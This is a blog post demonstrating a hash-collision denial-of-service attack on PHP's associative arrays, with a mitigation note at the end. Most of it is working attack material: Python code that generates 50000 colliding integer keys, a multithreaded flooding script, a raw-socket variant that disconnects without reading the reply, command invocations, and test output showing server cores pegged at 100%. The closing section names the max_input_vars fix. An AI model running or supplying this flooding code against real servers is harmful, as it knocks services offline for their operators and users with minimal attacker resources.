Some hours ago I was reading /r/programming when I found a post about the possibility, and the consequences, of externally forcing collisions inside PHP's associative arrays. It's something so... overwhelming? You have to try it to see the danger it represents. Let's go.

Note: on the 28th of this month a lecture was given at 28C3 which covers everything related to this; it's very interesting.

The danger is made worse by a combination of factors that PHP brings together:

  • The hash of an integer can be trivially predicted: it's the number itself (there's a sketch of this right after the list).

  • There are arrays the user can populate at will: $_GET, $_POST and $_COOKIE.
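
To make the first factor concrete, here is a minimal sketch; the constant and the helper name are my assumptions, not something from the post or the lecture:

# PHP stores an integer key k in bucket (k & (table_size - 1)), and
# table sizes are powers of two, so multiples of a sufficiently large
# power of two all pile up in bucket 0.

TABLE_SIZE = 2 ** 16  # big enough to hold the 50000 entries used later

def colliding_keys(n):
    """Return n integer keys that all map to bucket 0."""
    return [i * TABLE_SIZE for i in range(n)]

# Numeric variable names become integer array keys in PHP, so a
# malicious request body is simply:
body = "&".join("%d=x" % k for k in colliding_keys(50000))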

Now imagine what would happen if we launch a few malicious queries against a server. It can be a little tiresome to do it by hand, so here is a script to do it, prueba_hashmap_php.py... it's not pretty, it's not elegant, but it isn't intended to be either.

The script allows several options: whether or not it waits for the answer from the server, and how long it waits between one query and the next (both can be modified in lines 10 and 11). It also takes as parameters the number of variables to send, the number of queries to make and the number of threads to launch (in that order).
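
The script itself isn't reproduced here, but a minimal sketch of the same idea could look like this (the target URL and every name below are assumptions of mine, not the real script):

import sys
import time
import threading
import urllib.request

TARGET = "http://victim.example/index.php"  # assumed test URL

wait_for_server = True  # wait for the server to answer? ("line 10")
wait_between = 0.5      # seconds to wait between queries ("line 11")

def build_body(num_vars):
    # Integer keys that all collide in PHP's hash table (see above).
    return "&".join("%d=x" % (i * 2 ** 16) for i in range(num_vars)).encode()

def worker(body, num_queries):
    sent = 0
    while num_queries < 0 or sent < num_queries:  # -1 means "forever"
        try:
            response = urllib.request.urlopen(TARGET, data=body)
            if wait_for_server:
                response.read()
            # truly hanging up before the answer needs the raw-socket
            # variant shown further down in the post
        except Exception:
            pass  # 500s and dropped connections are expected here
        sent += 1
        time.sleep(wait_between)

if __name__ == "__main__":
    num_vars, num_queries, num_threads = (int(a) for a in sys.argv[1:4])
    body = build_body(num_vars)  # the body is prepared only once
    for _ in range(num_threads):
        threading.Thread(target=worker, args=(body, num_queries)).start()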

OK, now let's get to the tests. The "attacker" is a simple netbook too weak to emulate a mere N64 (just to give an idea); the "victim" is a Quad Core, not the latest on the market, but it should perform well, shouldn't it?

Well, it doesn't.

Launching an attack with a single query of 50000 elements and a single thread, waiting for the server, we obtain the data below.

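Assuming the argument order described earlier, that run corresponds to an invocation along the lines of (use a final 4 for the four-thread test further down):

python prueba_hashmap_php.py 50000 1 1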

[0] 500 > 0.192291021347 | 60.0323388577 <

----- Data -----

Codes:
500: 1 times

Average uploading time: 0.192291021347
Average downloading time: 60.0323388577

I think the problem is obvious: it took less than two tenths of a second to send the data (not counting the time to prepare the query, which is only done once), and nevertheless the server not only took 60 seconds and then failed with a 500 (Internal Server Error), but during all that time one core was working at 100% of its capacity.
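
The quadratic cost is easy to check on the back of an envelope: with every key in the same bucket, inserting the i-th element walks a chain of length i.

# One 50000-variable request costs about n*(n-1)/2 chain steps:
n = 50000
print(n * (n - 1) // 2)  # 1249975000 -> ~1.25e9 comparisons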

And what if we repeat it with four threads?

[1] 500 > 0.75856590271  | 60.0828011036 <
[0] 500 > 0.740755081177 | 62.4277861118 <
[3] 500 > 0.806277036667 | 67.9619438648 <
[2] 500 > 0.784065008163 | 69.3936538696 <

----- Data -----

Codes:
500: 4 times

Average uploading time: 0.772415757179
Average downloading time: 64.9665462375

And during that time four (of four) cores are working at 100%.

If someone is thinking that a complex script explains this, here is the one that was tested:

<?php
   echo "Jau!";
?>

But this isn't just about a low-traffic denial of service; it can get worse. What if, immediately after sending a query, we disconnect and send another one?

wait_for_server = False # Wait for the server to answer?
wait_between = 0.5 # Seconds to wait between connections
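
Truly disconnecting right after sending can be done at the socket level: write the request, close the connection, and let the server do all the work for an answer nobody will read. A hypothetical sketch of that variant:

import socket

def fire_and_forget(host, body, port=80):
    """POST the body and hang up without reading the answer."""
    request = ("POST /index.php HTTP/1.1\r\n"
               "Host: %s\r\n"
               "Content-Type: application/x-www-form-urlencoded\r\n"
               "Content-Length: %d\r\n"
               "Connection: close\r\n"
               "\r\n" % (host, len(body)))
    s = socket.create_connection((host, port))
    s.sendall(request.encode("ascii") + body)
    s.close()  # the server keeps parsing the POST all the same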

If it's launched with blocks of 50000 values, with an infinite number of queries (-1 will do) and, let's say... 10 threads, we'll see something interesting. Apart from all cores going to 100%, at first the attack takes considerable bandwidth, ~3 MB (less than a minute later it only takes ~1 KB to maintain it), and memory use grows, starting very fast and then slowing down, until after ~10 minutes it consumes almost a gigabyte. And all of this while a mere netbook devotes no more than 1% of its resources to the attack.
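
With those two lines changed, and assuming again the argument order from before, that sustained attack is launched as something like:

python prueba_hashmap_php.py 50000 -1 10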

Solution

As the first referenced post says, there is already a commit in the PHP SVN which adds a max_input_vars directive to limit the number of parameters that can be received in one query. According to the post, it will arrive with version 5.3.9 (the Trisquel repositories currently carry 5.3.5). In theory another option would be to use the Suhosin patch, which Debian and derivatives ship by default but, after trying it, I cannot say it works :/
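
For reference, once the fix lands the cap is a single php.ini line (1000 is the documented default):

; php.ini (PHP >= 5.3.9)
max_input_vars = 1000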

That's all, see you soon.